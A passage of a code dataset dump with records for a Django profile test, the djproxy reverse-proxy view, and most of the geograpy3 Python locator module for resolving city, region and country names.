test.main()\n","repo_name":"baidu-research/tensorflow-allreduce","sub_path":"tensorflow/python/kernel_tests/svd_op_test.py","file_name":"svd_op_test.py","file_ext":"py","file_size_in_byte":6325,"program_lang":"python","lang":"en","doc_type":"code","stars":372,"dataset":"github-code","pt":"3"} +{"seq_id":"38170132166","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\n\nfrom .forms import EditUserProfile\nfrom .models import UserProfile\n\n\nclass ProfileModelTests(TestCase):\n def setUp(self):\n self.user = get_user_model().objects.create_user(\n username='testuser',\n email='test@email.com',\n password='secret'\n )\n\n def test_user_profile_string_representation(self):\n test_user = UserProfile.objects.get(user__username='testuser')\n self.assertEqual(str(test_user), 'testuser')\n\n def test_edit_user_profile_form(self):\n test_user = UserProfile.objects.get(user__username='testuser')\n form = EditUserProfile({\n 'user': test_user,\n 'default_phone_number': 'Test phone',\n 'default_street_address1': 'test address1',\n 'default_street_address2': 'test address2',\n 'default_town_or_city': 'test town',\n 'default_county': 'test county',\n 'default_postcode': 'Test post code',\n 'default_country': 'IE',\n })\n self.assertTrue(form.is_valid())\n","repo_name":"Bourkekev/ms4-power-fitness-gym","sub_path":"profiles/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72486021841","text":"\"\"\"HTTP Reverse Proxy class based generic view.\"\"\"\nfrom django import get_version as get_django_version\nfrom django.http import HttpResponse\nfrom django.views.generic import View\nfrom requests import request\nfrom six.moves.urllib.parse import urljoin\nfrom six import iteritems\n\nfrom .headers import HeaderDict\nfrom .proxy_middleware import MiddlewareSet\nfrom .request import 
DownstreamRequest\n\n\nclass HttpProxy(View):\n \"\"\"Reverse HTTP Proxy class-based generic view.\"\"\"\n\n base_url = None\n ignored_upstream_headers = [\n 'Content-Length', 'Content-Encoding', 'Keep-Alive', 'Connection',\n 'Transfer-Encoding', 'Host', 'Expect', 'Upgrade']\n ignored_request_headers = [\n 'Content-Length', 'Content-Encoding', 'Keep-Alive', 'Connection',\n 'Transfer-Encoding', 'Host', 'Expect', 'Upgrade']\n proxy_middleware = [\n 'djproxy.proxy_middleware.AddXFF',\n 'djproxy.proxy_middleware.AddXFH',\n 'djproxy.proxy_middleware.AddXFP',\n 'djproxy.proxy_middleware.ProxyPassReverse'\n ]\n pass_query_string = True\n reverse_urls = []\n verify_ssl = True\n cert = None\n timeout = None\n\n @property\n def proxy_url(self):\n \"\"\"Return URL to the resource to proxy.\"\"\"\n return urljoin(self.base_url, self.kwargs.get('url', ''))\n\n def _verify_config(self):\n assert self.base_url, 'base_url must be set to generate a proxy url'\n\n for rule in self.reverse_urls:\n assert len(rule) == 2, 'reverse_urls must be 2 string iterables'\n\n iter(self.ignored_upstream_headers)\n iter(self.ignored_request_headers)\n iter(self.proxy_middleware)\n\n def dispatch(self, request, *args, **kwargs):\n \"\"\"Dispatch all HTTP methods to the proxy.\"\"\"\n self.request = DownstreamRequest(request)\n self.args = args\n self.kwargs = kwargs\n\n self._verify_config()\n\n self.middleware = MiddlewareSet(self.proxy_middleware)\n\n return self.proxy()\n\n def proxy(self):\n \"\"\"Retrieve the upstream content and build an HttpResponse.\"\"\"\n headers = self.request.headers.filter(self.ignored_request_headers)\n qs = self.request.query_string if self.pass_query_string else ''\n\n # Fix for django 1.10.0 bug https://code.djangoproject.com/ticket/27005\n if (self.request.META.get('CONTENT_LENGTH', None) == '' and\n get_django_version() == '1.10'):\n del self.request.META['CONTENT_LENGTH']\n\n request_kwargs = self.middleware.process_request(\n self, self.request, method=self.request.method, url=self.proxy_url,\n headers=headers, data=self.request.body, params=qs,\n allow_redirects=False, verify=self.verify_ssl, cert=self.cert,\n timeout=self.timeout)\n\n result = request(**request_kwargs)\n\n response = HttpResponse(result.content, status=result.status_code)\n\n # Attach forwardable headers to response\n forwardable_headers = HeaderDict(result.headers).filter(\n self.ignored_upstream_headers)\n for header, value in iteritems(forwardable_headers):\n response[header] = value\n\n return self.middleware.process_response(\n self, self.request, result, response)\n","repo_name":"thomasw/djproxy","sub_path":"djproxy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"3"} +{"seq_id":"8783219098","text":"'''\nThe locator module allows to get detailed city \ninformation including the region and country of a city from a \nlocation string.\n\nExamples for location strings are:\n\n Amsterdam, Netherlands\n Vienna, Austria\n Vienna, IL\n Paris - Texas\n Paris TX\n \nthe locator will lookup the cities and try to disambiguate the result based on the country or region information found.\n\nThe results in string representationa are:\n \n Amsterdam (NH(North Holland) - NL(Netherlands))\n Vienna (9(Vienna) - AT(Austria))\n Vienna (IL(Illinois) - US(United States))\n Paris (TX(Texas) - US(United States)) \n Paris (TX(Texas) - US(United States))\n \nEach city returned has a city.region and city.country 
attribute with the details of the city.\n \n\nCreated on 2020-09-18\n\n@author: wf\n'''\nimport os\nimport glob\nimport urllib\nimport re\nimport csv\nimport sys\nimport gzip\nimport shutil\nimport json\nfrom pathlib import Path\n\nfrom lodstorage.entity import EntityManager\nfrom lodstorage.storageconfig import StorageConfig, StoreMode\nfrom sklearn.neighbors import BallTree\nfrom geograpy.wikidata import Wikidata\nfrom lodstorage.sql import SQLDB\nfrom geograpy.utils import remove_non_ascii\nfrom geograpy import wikidata\nfrom argparse import ArgumentParser\nfrom argparse import RawDescriptionHelpFormatter\nfrom lodstorage.jsonable import JSONAble\nfrom math import radians, cos, sin, asin, sqrt\nfrom geograpy.utils import Profiler, Download\n\nclass LocationManager(EntityManager):\n '''\n a list of locations\n '''\n \n def __init__(self, name:str, entityName:str, entityPluralName:str, listName:str=None, tableName:str=None,clazz=None, primaryKey:str=None, config:StorageConfig=None, handleInvalidListTypes=True, filterInvalidListTypes=False, debug=False):\n '''\n construct me\n\n Args:\n name(string): name of this LocationManager\n entityName(string): entityType to be managed e.g. Country\n entityPluralName(string): plural of the the entityType e.g. Countries\n listName(str): the name of the list to hold\n tableName(str): the name of the table to use\n config(StorageConfig): the configuration to be used if None a default configuration will be used\n handleInvalidListTypes(bool): True if invalidListTypes should be converted or filtered\n filterInvalidListTypes(bool): True if invalidListTypes should be deleted\n debug(boolean): override debug setting when default of config is used via config=None\n '''\n if config is None:\n config=LocationContext.getDefaultConfig()\n super().__init__(name=name,\n entityName=entityName,\n entityPluralName=entityPluralName,\n listName=listName,\n clazz=clazz,\n tableName=tableName,\n primaryKey=primaryKey,\n config=config,\n handleInvalidListTypes=handleInvalidListTypes,\n filterInvalidListTypes=filterInvalidListTypes,\n debug=debug)\n self.balltree = None\n self.locationByWikidataID={}\n if config is not None and config.mode==StoreMode.SQL:\n self.sqldb=self.getSQLDB(config.cacheFile)\n\n def getBallTuple(self, cache:bool=True):\n '''\n get the BallTuple=BallTree,validList of this location list\n \n Args:\n cache(bool): if True calculate and use a cached version otherwise recalculate on\n every call of this function\n \n Returns:\n BallTree,list: a sklearn.neighbors.BallTree for the given list of locations, list: the valid list of locations\n list: valid list of locations\n '''\n validList = []\n if self.balltree is None or not cache:\n coordinatesrad = []\n for location in self.getList():\n if location.lat and location.lon:\n latlonrad = (radians(location.lat), radians(location.lon))\n coordinatesrad.append(latlonrad)\n validList.append(location)\n self.ballTuple = BallTree(coordinatesrad, metric='haversine'), validList\n return self.ballTuple\n \n def fromCache(self,force=False,getListOfDicts=None,sampleRecordCount=-1):\n '''\n get me from the cache\n '''\n super().fromCache(force, getListOfDicts, sampleRecordCount)\n self.locationByWikidataID={}\n for entry in self.getList():\n self.locationByWikidataID[entry.wikidataid]=entry\n\n def getLocationByID(self, wikidataID:str):\n '''\n Returns the location object that corresponds to the given location\n\n Args:\n wikidataID: wikidataid of the location that should be returned\n\n Returns:\n Location object\n 
'''\n location=None\n if wikidataID in self.locationByWikidataID:\n location=self.locationByWikidataID[wikidataID]\n return location\n \n def add(self,location):\n '''\n add the given location to me \n \n Args:\n location(object): the location to be added and put in my hash map\n '''\n self.getList().append(location)\n if hasattr(location,\"wikidataid\"):\n self.locationByWikidataID[location.wikidataid]=location\n\n \n @staticmethod\n def getBackupDirectory():\n path = str(Path(Path.home(), \".geograpy3\"))\n return path\n \n @classmethod\n def downloadBackupFileFromGitHub(cls,fileName:str, targetDirectory:str=None, force:bool=False):\n '''\n download the given fileName from the github data directory\n \n Args:\n fileName(str): the filename to download\n targetDirectory(str): download the file this directory\n force(bool): force the overwriting of the existent file\n \n Return:\n str: the local file\n '''\n # Data is downloaded from the github wiki - to modify the data clone the wiki\n # as documented in https://github.com/somnathrakshit/geograpy3/wiki\n # git clone https://github.com/somnathrakshit/geograpy3.wiki.git\n url = f\"https://raw.githubusercontent.com/wiki/somnathrakshit/geograpy3/data/{fileName}.gz\"\n if targetDirectory is None:\n targetDirectory=LocationManager.getBackupDirectory()\n backupFile = Download.downloadBackupFile(url, fileName, targetDirectory, force)\n return backupFile\n\n def getByName(self, *names:str):\n '''\n Get locations matching given names\n Args:\n name: Name of the location\n\n Returns:\n Returns locations that match the given name\n '''\n query = f\"SELECT * FROM {self.clazz.__name__}Lookup WHERE label IN ({','.join('?'*len(names))})\"\n sqldb=self.getSQLDB(self.config.cacheFile)\n locationRecords = sqldb.query(query, params=tuple(names))\n locations=self._locationsFromLookup(*locationRecords)\n return locations\n\n def getLocationsByWikidataId(self, *wikidataId:str):\n '''\n Returns Location objects for the given wikidataids\n Args:\n *wikidataId(str): wikidataIds of the locations that should be returned\n\n Returns:\n Location objects matching the given wikidataids\n '''\n wikidataIds=set(wikidataId)\n if wikidataIds is None or not wikidataIds:\n return\n query=f\"SELECT * FROM {self.clazz.__name__}Lookup WHERE wikidataid IN ({','.join('?'*len(wikidataIds))})\"\n sqldb = self.getSQLDB(self.config.cacheFile)\n locationRecords=sqldb.query(query, params=tuple(list(wikidataIds)))\n if locationRecords:\n locations=self._locationsFromLookup(*locationRecords)\n return locations\n else:\n if self.debug:\n print(\"No Records matching the given wikidataIds found.\")\n return\n\n def _locationsFromLookup(self, *locationRecords:dict):\n '''\n Convert given lookup records to the corresponding location objects\n Args:\n *locationRecords: lookup records of locations\n\n Returns:\n List of Location objects based on the given records\n '''\n if self.clazz is City:\n locations=[City.fromCityLookup(record) for record in locationRecords]\n elif self.clazz is Region:\n locations = [Region.fromRegionLookup(record) for record in locationRecords]\n elif self.clazz is Country:\n locations = [Country.fromCountryLookup(record) for record in locationRecords]\n else:\n locations=[self.clazz.fromRecord(lr) for lr in locationRecords]\n return locations\n\n def getLocationByIsoCode(self, isoCode:str):\n '''\n Get possible locations matching the given isoCode\n Args:\n isoCode: isoCode of possible Locations\n\n Returns:\n List of wikidata ids of locations matching the given 
isoCode\n '''\n if isinstance(self, RegionManager) or isinstance(self, CountryManager):\n if isinstance(self, RegionManager):\n query = f\"SELECT wikidataid FROM {self.tableName} WHERE iso LIKE (?) OR iso LIKE (?)\"\n params = (f\"%-{isoCode}\", isoCode,)\n else:\n query = f\"SELECT wikidataid FROM {self.tableName} WHERE iso LIKE (?)\"\n params = (isoCode,)\n sqldb = self.getSQLDB(self.config.cacheFile)\n qres = sqldb.query(query, params)\n locationIds = [record['wikidataid'] for record in qres if 'wikidataid' in record]\n return locationIds\n else:\n return []\n\nclass CountryManager(LocationManager):\n '''\n a list of countries\n '''\n \n def __init__(self, name:str=\"CountryManager\", config:StorageConfig=None, debug=False):\n super().__init__(name=name,\n entityName=\"country\",\n entityPluralName=\"countries\",\n clazz=Country,\n primaryKey=\"wikidataid\",\n tableName=\"countries\",\n config=config,\n debug=debug\n )\n self.wd=Wikidata()\n self.getListOfDicts=self.wd.getCountries\n\n @classmethod\n def fromErdem(cls):\n '''\n get country list provided by Erdem Ozkol https://github.com/erdem\n '''\n countryManager = CountryManager(name=\"countries_erdem\")\n countryJsonUrl = \"https://gist.githubusercontent.com/erdem/8c7d26765831d0f9a8c62f02782ae00d/raw/248037cd701af0a4957cce340dabb0fd04e38f4c/countries.json\"\n with urllib.request.urlopen(countryJsonUrl) as url:\n jsonCountryList = json.loads(url.read().decode())\n for jsonCountry in jsonCountryList:\n country = Country()\n country.name = jsonCountry['name']\n country.iso = jsonCountry['country_code']\n country.lat = jsonCountry['latlng'][0]\n country.lon = jsonCountry['latlng'][1]\n countryManager.add(country)\n\n return countryManager\n\n\nclass RegionManager(LocationManager):\n '''\n a list of regions\n '''\n\n def __init__(self, name:str=\"RegionManager\", config:StorageConfig=None,debug=False):\n super().__init__(name=name,\n entityName=\"region\",\n entityPluralName=\"regions\",\n clazz=Region,\n primaryKey=\"regionId\",\n tableName=\"regions\",\n config=config,\n debug=debug\n )\n self.wd=Wikidata()\n def _queryRegions(**kwargs):\n return [*self.wd.getRegions(**kwargs), *self.wd.getCityStates(**kwargs)]\n self.getListOfDicts=_queryRegions\n\n\nclass CityManager(LocationManager):\n '''\n a list of cities\n '''\n\n def __init__(self, name:str=\"CityManager\",config:StorageConfig=None,debug=False):\n super().__init__(name=name,\n entityName=\"city\",\n entityPluralName=\"cities\",\n clazz=City,\n primaryKey=None,\n tableName=\"cities\",\n config=config,\n debug=debug\n )\n self.wd=Wikidata()\n self.getListOfDicts=self.wd.getCities\n \n @classmethod \n def getJsonFiles(cls,config:StorageConfig) -> list: \n '''\n get the list of the json files that have my data\n \n Return:\n list: a list of json file names\n \n '''\n jsondir=f\"{config.getCachePath()}/regions\"\n if not os.path.exists(jsondir):\n os.makedirs(jsondir)\n jsonFiles = sorted(glob.glob(f\"{jsondir}/*.json\"), key=lambda path:int(re.findall(r'\\d+', path)[0]))\n return jsonFiles\n \n \nclass Earth:\n radius = 6371.000 # radius of earth in km\n\n\nclass Location(JSONAble):\n '''\n Represents a Location\n '''\n\n def __init__(self, **kwargs):\n for key in kwargs.keys():\n setattr(self, key, kwargs[key])\n \n @classmethod\n def getSamples(cls):\n samplesLOD = [{\n \"name\": \"Los Angeles\",\n \"wikidataid\": \"Q65\",\n \"lat\": 34.05223,\n \"lon\":-118.24368,\n \"partOf\": \"US/CA\",\n \"level\": 5,\n \"locationKind\": \"City\",\n \"comment\": None,\n \"population\": 
3976322\n }]\n return samplesLOD\n\n @staticmethod\n def haversine(lon1, lat1, lon2, lat2):\n \"\"\"\n Calculate the great circle distance between two points \n on the earth (specified in decimal degrees)\n \"\"\"\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n \n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a)) \n return c * Earth.radius\n\n def getNClosestLocations(self, lookupLocationManager, n:int):\n \"\"\"\n Gives a list of up to n locations which have the shortest distance to \n me as calculated from the given listOfLocations\n \n Args:\n lookupLocationManager(LocationManager): a LocationManager object to use for lookup\n n(int): the maximum number of closest locations to return \n \n Returns:\n list: a list of result Location/distance tuples\n \"\"\"\n balltree, lookupListOfLocations = lookupLocationManager.getBallTuple()\n # check for n+1 entries since we might have my own record in the lookup list which we'll ignore late\n distances, indices = balltree.query([[radians(self.lat), radians(self.lon)]], k=n + 1, return_distance=True)\n resultLocations = self.balltreeQueryResultToLocationManager(distances[0], indices[0], lookupListOfLocations)\n return resultLocations\n \n def getLocationsWithinRadius(self, lookupLocationManager, radiusKm:float):\n \"\"\"\n Gives the n closest locations to me from the given lookupListOfLocations\n \n Args:\n lookupLocationManager(LocationManager): a LocationManager object to use for lookup\n radiusKm(float): the radius in which to check (in km)\n \n Returns:\n list: a list of result Location/distance tuples\n \"\"\"\n balltree, lookupListOfLocations = lookupLocationManager.getBallTuple()\n \n indices, distances = balltree.query_radius([[radians(self.lat), radians(self.lon)]], r=radiusKm / Earth.radius,\n return_distance=True)\n locationList = self.balltreeQueryResultToLocationManager(distances[0], indices[0], lookupListOfLocations)\n return locationList\n \n def balltreeQueryResultToLocationManager(self, distances, indices, lookupListOfLocations):\n '''\n convert the given ballTree Query Result to a LocationManager\n \n Args:\n distances(list): array of distances\n indices(list): array of indices\n lookupListOfLocations(list): a list of valid locations to use for lookup\n \n Return:\n list: a list of result Location/distance tuples\n '''\n locationListWithDistance = []\n for i, locationIndex in enumerate(indices):\n distance = distances[i] * Earth.radius \n location = lookupListOfLocations[locationIndex]\n # do not add myself or any other equivalent location\n if not distance < 0.0001:\n locationListWithDistance.append((location, distance))\n # sort by distance (Ball tree only does this for one of the queries ...) 
\n locationListWithDistance = sorted(locationListWithDistance, key=lambda lwd: lwd[1])\n return locationListWithDistance\n\n def distance(self, other) -> float:\n '''\n calculate the distance to another Location\n \n Args:\n other(Location): the other location\n \n Returns:\n the haversine distance in km\n '''\n # see https://stackoverflow.com/questions/4913349/haversine-formula-in-python-bearing-and-distance-between-two-gps-points\n distance = Location.haversine(self.lon, self.lat, other.lon, other.lat)\n return distance\n\n def isKnownAs(self, name) -> bool:\n '''\n Checks if this location is known under the given name\n\n Args:\n name(str): name the location should be checked against\n\n Returns:\n True if the given name is either the name of the location or present in the labels of the location\n '''\n isKnown = False\n if hasattr(self, 'labels'):\n if name in self.labels:\n isKnown = True\n if hasattr(self, 'name'):\n if name == self.name:\n isKnown = True\n return isKnown\n\n @staticmethod\n def partialDict(record, clazz, keys=None):\n if keys is None:\n keys = clazz.getSamples()[0].keys()\n pDict = {k: v for k, v in record.items() if k in keys}\n return pDict\n\n @staticmethod\n def mappedDict(record, keyMapList: list):\n keyMap = {}\n for mkey, mValue in keyMapList:\n keyMap[mkey] = mValue\n pDict = {keyMap[k]: v for k, v in record.items() if k in keyMap.keys()}\n return pDict\n\n @classmethod\n def fromRecord(cls,regionRecord: dict):\n '''\n create a location from a dict record\n\n Args:\n regionRecord(dict): the records as returned from a Query\n\n Returns:\n Region: the corresponding region information\n '''\n location=cls()\n location.fromDict(regionRecord)\n return location\n\n \nclass City(Location):\n '''\n a single city as an object\n '''\n\n def __init__(self, **kwargs):\n super(City, self).__init__(**kwargs)\n if not hasattr(self, 'level'):\n setattr(self, 'level', 5)\n if not hasattr(self, 'locationKind'):\n setattr(self, 'locationKind', \"City\")\n self._country = None\n self._region = None\n\n @classmethod\n def getSamples(cls):\n samplesLOD = [{\n \"name\": \"Los Angeles\",\n \"wikidataid\": \"Q65\",\n \"lat\": 34.05223,\n \"lon\":-118.24368,\n \"geoNameId\": \"5368361\",\n \"gndId\": \"4036361-2\",\n \"partOf\": \"US/CA\",\n \"level\": 5,\n \"locationKind\": \"City\",\n \"pop\": \"3976322\",\n \"regionId\": \"Q99\",\n \"countryId\": \"Q30\"\n }]\n return samplesLOD\n \n def __str__(self):\n name=self.name if hasattr(self,\"name\") else \"?\"\n text = f\"{name} ({self.region} - {self.country})\"\n return text\n\n @staticmethod\n def fromCityLookup(cityLookupRecord:dict):\n '''\n\n create a city from a cityLookupRecord and setting City, Region and Country while at it\n Args:\n cityRecord(dict): a map derived from the CityLookup view\n\n '''\n # we create city, region and country from scratch without true\n # object relational mapping and lookup from the locationContext \n # this is only useful for small result sets that need no further interlinking\n city=City()\n # first take all params\n cityRecord=City.partialDict(cityLookupRecord,City)\n city.fromDict(cityRecord)\n\n regionRecord=City.mappedDict(cityLookupRecord,\n [(\"regionId\",\"wikidataid\"),(\"regionName\",\"name\"),(\"regionIso\",\"iso\"),(\"regionPop\",\"pop\"),(\"regionLat\",\"lat\"),(\"regionLon\",\"lon\")])\n city.region=Region.fromRecord(regionRecord)\n\n countryRecord=City.mappedDict(cityLookupRecord,\n 
[(\"countryId\",\"wikidataid\"),(\"countryName\",\"name\"),(\"countryIso\",\"iso\"),(\"countryLat\",\"lat\"),(\"countryLon\",\"lon\")])\n city.country=Country()\n city.country.fromDict(countryRecord)\n city.region.country=city.country\n return city\n \n def setValue(self, name, record):\n '''\n set a field value with the given name to\n the given record dicts corresponding entry or none\n \n Args:\n name(string): the name of the field\n record(dict): the dict to get the value from\n '''\n if name in record:\n value = record[name]\n else:\n value = None\n setattr(self, name, value)\n\n @property\n def country(self):\n return self._country\n\n @country.setter\n def country(self, country):\n self._country = country\n\n @property\n def region(self):\n return self._region\n\n @region.setter\n def region(self, region):\n self._region = region\n\n \nclass Region(Location):\n '''\n a Region (Subdivision)\n '''\n\n def __init__(self, **kwargs):\n super(Region, self).__init__(**kwargs)\n if not hasattr(self, 'level'):\n setattr(self, 'level', 4)\n if not hasattr(self, 'locationKind'):\n setattr(self,'locationKind', \"Region\")\n self._country = None\n\n @classmethod\n def getSamples(cls):\n samplesLOD = [{\n \"name\": \"California\",\n \"wikidataid\": \"Q99\",\n \"lat\": 37.0,\n \"lon\":-120.0,\n \"partOf\": \"US\",\n \"level\": 4,\n \"locationKind\": \"Region\",\n \"comment\": None,\n \"labels\": [\"CA\", \"California\"],\n \"iso\": \"US-CA\",\n \"country_wikidataid\": \"Q30\"\n }]\n return samplesLOD\n \n def __str__(self):\n text = f\"{self.iso}({self.name})\" \n return text\n\n @property\n def country(self):\n return self._country\n\n @country.setter\n def country(self, country):\n self._country = country\n\n @staticmethod\n def fromRegionLookup(regionLookupRecord: dict):\n '''\n\n create a region from a regionLookupRecord and setting Region and Country while at it\n Args:\n regionRecord(dict): a map derived from the CityLookup view\n '''\n # we create region and country from scratch without true\n # object relational mapping and lookup from the locationContext\n # this is only useful for small result sets that need no further interlinking\n region = Region()\n # first take all params\n regionRecord = Location.partialDict(regionLookupRecord, Region)\n region.fromDict(regionRecord)\n countryRecord = Location.mappedDict(regionLookupRecord,\n [(\"countryId\", \"wikidataid\"), (\"countryName\", \"name\"), (\"countryIso\", \"iso\"),\n (\"countryLat\", \"lat\"), (\"countryLon\", \"lon\")])\n region.country = Country()\n region.country.fromDict(countryRecord)\n return region\n\n\nclass Country(Location):\n '''\n a country\n '''\n\n def __init__(self, lookupSource='sqlDB', **kwargs):\n '''\n coonstruct me\n '''\n super(Country, self).__init__(**kwargs)\n if not hasattr(self, 'level'):\n setattr(self, 'level', 3)\n if not hasattr(self, 'locationKind'):\n setattr(self, 'locationKind', \"Country\")\n\n @classmethod\n def getSamples(cls):\n samplesLOD = [\n {\n 'wikidataid': 'Q38', \n 'name': 'Italy', \n 'iso': 'IT', \n 'pop': 60317000.0, \n 'lat': 42.5, \n 'lon': 12.5,\n },\n {\n \"name\": \"United States of America\",\n \"wikidataid\": \"Q30\",\n \"lat\": 39.82818,\n \"lon\":-98.5795,\n \"partOf\": \"North America\",\n \"level\": 3,\n \"locationKind\": \"Country\",\n \"comment\": None,\n \"labels\":[\"USA\", \"US\", \"United States of America\"],\n \"iso\":\"US\"\n }, {\n }]\n return samplesLOD\n\n def __str__(self):\n text = f\"{self.iso}({self.name})\" \n return text\n\n @staticmethod\n def 
fromCountryLookup(countryLookupRecord: dict):\n '''\n\n create a region from a regionLookupRecord and setting Region and Country while at it\n Args:\n regionRecord(dict): a map derived from the CityLookup view\n '''\n # we create region and country from scratch without true\n # object relational mapping and lookup from the locationContext\n # this is only useful for small result sets that need no further interlinking\n country = Country()\n countryRecord = Location.partialDict(countryLookupRecord, Region)\n country.fromDict(countryRecord)\n return country\n\n\nclass LocationContext(object):\n '''\n Holds LocationManagers of all hierarchy levels and provides methods to traverse through the levels\n '''\n db_filename=\"locations.db\"\n\n def __init__(self, countryManager:CountryManager, regionManager:RegionManager, cityManager:CityManager, config:StorageConfig):\n '''\n construct me\n \n Args:\n countryManager(CountryManager): the country manager to be used\n regionManager(RegionManager): the region manager to be used\n cityManager(CityManager): the city manager to be used\n '''\n self.countryManager = countryManager\n self.regionManager = regionManager\n self.cityManager = cityManager\n self.locator=Locator(storageConfig=config)\n\n def interlinkLocations(self,warnOnDuplicates:bool=True,profile=True):\n '''\n Interlinks locations by adding the hierarchy references to the locations\n \n Args:\n warnOnDuplicates(bool): if there are duplicates warn \n '''\n profile=Profiler(\"interlinking Locations\", profile=profile) \n duplicates=[]\n self._countryLookup, _dup = self.countryManager.getLookup(\"wikidataid\")\n duplicates.extend(_dup)\n self._regionLookup, _dup = self.regionManager.getLookup(\"wikidataid\")\n duplicates.extend(_dup)\n self._cityLookup, _dup = self.cityManager.getLookup(\"wikidataid\")\n duplicates.extend(_dup)\n if len(duplicates)>0 and warnOnDuplicates:\n print(f\"There are {len(duplicates)} duplicate wikidataids in the country,region and city managers used\")\n if self.debug:\n print(duplicates)\n # interlink region with country\n for region in self.regions:\n country = self._countryLookup.get(getattr(region, 'countryId'))\n if country is not None and isinstance(country, Country):\n region.country = country\n\n # interlink city with region and country\n for city in self.cities:\n country = self._countryLookup.get(getattr(city, 'countryId'))\n if country is not None and isinstance(country, Country):\n city.country = country\n region = self._regionLookup.get(getattr(city, 'regionId'))\n if region is not None and isinstance(region, Region):\n city.region = region\n _elapsed=profile.time()\n \n \n def load(self,forceUpdate:bool=False,warnOnDuplicates:bool=False):\n '''\n load my data\n '''\n for manager in self.countryManager,self.regionManager,self.cityManager:\n manager.fromCache(force=forceUpdate)\n self.interlinkLocations(warnOnDuplicates=warnOnDuplicates)\n \n\n @classmethod\n def fromCache(cls, config:StorageConfig=None, forceUpdate:bool=False):\n '''\n Inits a LocationContext form Cache if existent otherwise init cache\n\n Args:\n config(StorageConfig): configuration of the cache if None the default config is used\n forceUpdate(bool): If True an existent cache will be over written\n '''\n if config is None:\n config = cls.getDefaultConfig()\n if Download.needsDownload(config.cacheFile):\n LocationManager.downloadBackupFileFromGitHub(fileName=cls.db_filename,\n targetDirectory=config.getCachePath(),\n force=forceUpdate)\n cityManager = CityManager(\"cities\", 
config=config)\n regionManager = RegionManager(\"regions\", config=config)\n countryManager = CountryManager(\"countries\", config=config)\n locationContext = LocationContext(countryManager, regionManager, cityManager, config)\n return locationContext\n\n @staticmethod\n def getDefaultConfig() -> StorageConfig:\n '''\n Returns default StorageConfig\n '''\n config = StorageConfig(cacheFile=LocationContext.db_filename,cacheDirName=\"geograpy3\")\n config.cacheFile=f\"{config.getCachePath()}/{config.cacheFile}\"\n return config\n\n @property\n def countries(self) -> list:\n return self.countryManager.getList()\n\n @property\n def regions(self) -> list:\n return self.regionManager.getList()\n\n @property\n def cities(self) -> list:\n return self.cityManager.getList()\n\n def locateLocation(self, *locations, verbose:bool=False):\n '''\n Get possible locations for the given location names.\n Current prioritization of the results is city(ordered by population)→region→country\n ToDo: Extend the ranking of the results e.g. matching of multiple location parts increase ranking\n Args:\n *locations:\n verbose(bool): If True combinations of locations names are used to improve the search results. (Increases lookup time)\n\n Returns:\n\n '''\n if locations is None or locations is (None):\n return\n locationParts = []\n for location in locations:\n if location is not None:\n for locationPart in location.split(','):\n locationParts.append(locationPart)\n # Split locationParts even further\n lp=[]\n for locationPart in locationParts:\n parts=locationPart.split(' ')\n lp.extend(parts)\n # Spliting by space breakes the look up for cities such as 'Los Angeles'\n if verbose:\n numberParts=len(parts)\n if numberParts>1:\n lp.extend([f\"{parts[i]} {parts[i+1]}\" for i in range(numberParts-1)])\n # if numberParts > 2:\n # lp.extend([f\"{parts[i]} {parts[i + 1]} {parts[i + 2]}\" for i in range(numberParts - 2)])\n locationParts.extend(lp)\n locationParts=list(set(locationParts)) # remove duplicates\n\n cities=self.cityManager.getByName(*locationParts)\n regions = self.regionManager.getByName(*locationParts)\n countries = self.countryManager.getByName(*locationParts)\n\n # remove locations already identified by location in lower hierarchy\n getAttrValues=lambda locations, attr:[getattr(location,attr) for location in locations if hasattr(location, attr)]\n excludeRegionIds=getAttrValues(cities, 'regionId')\n regions=[region for region in regions if hasattr(region, 'wikidataid') and not region.wikidataid in excludeRegionIds]\n excludeCountryIds=[*getAttrValues(cities, \"countryId\"), *getAttrValues(regions, \"countryId\")]\n countries=[country for country in countries if hasattr(country, 'wikidataid') and not country.wikidataid in excludeCountryIds]\n\n # build final result in the order city→region→country\n cities.sort(key=lambda c: int(getattr(c, 'pop', 0)) if getattr(c, 'pop') is not None else 0, reverse=True)\n res = [*cities, *regions, *countries]\n return res\n\n\n\nclass Locator(object):\n '''\n location handling\n '''\n \n # singleton instance\n locator = None\n\n def __init__(self, db_file=None, correctMisspelling=False, storageConfig:StorageConfig=None, debug=False):\n '''\n Constructor\n \n Args:\n db_file(str): the path to the database file\n correctMispelling(bool): if True correct typical misspellings\n storageConfig(StorageConfig): the storage Configuration to use\n debug(bool): if True show debug information\n '''\n self.debug = debug\n self.correctMisspelling = correctMisspelling\n if storageConfig is 
None:\n storageConfig=LocationContext.getDefaultConfig()\n self.storageConfig=storageConfig\n if db_file is None:\n self.db_path = self.storageConfig.getCachePath()\n self.db_file = self.storageConfig.cacheFile\n else:\n self.db_file=db_file\n self.view = \"CityLookup\"\n self.loadDB()\n self.getAliases()\n self.dbVersion = \"2021-08-18 16:15:00\"\n \n @staticmethod\n def resetInstance():\n Locator.locator = None \n \n @staticmethod\n def getInstance(correctMisspelling=False, debug=False):\n '''\n get the singleton instance of the Locator. If parameters are changed on further calls\n the initial parameters will still be in effect since the original instance will be returned!\n \n Args:\n correctMispelling(bool): if True correct typical misspellings\n debug(bool): if True show debug information\n '''\n if Locator.locator is None:\n Locator.locator = Locator(correctMisspelling=correctMisspelling, debug=debug)\n return Locator.locator\n\n def normalizePlaces(self,places:list):\n '''\n normalize places\n\n Args:\n places(list) a list of places\n\n Return:\n list: stripped and aliased list of places\n '''\n nplaces=[]\n for place in places:\n place = place.strip()\n if place in self.aliases:\n place = self.aliases[place]\n nplaces.append(place)\n return nplaces\n\n def locateCity(self, places:list):\n '''\n locate a city, region country combination based on the given wordtoken information\n \n Args:\n places(list): a list of places derived by splitting a locality e.g. \"San Francisco, CA\"\n leads to \"San Francisco\", \"CA\"\n \n Returns:\n City: a city with country and region details\n '''\n # make sure the database is populated\n self.populate_db()\n country = 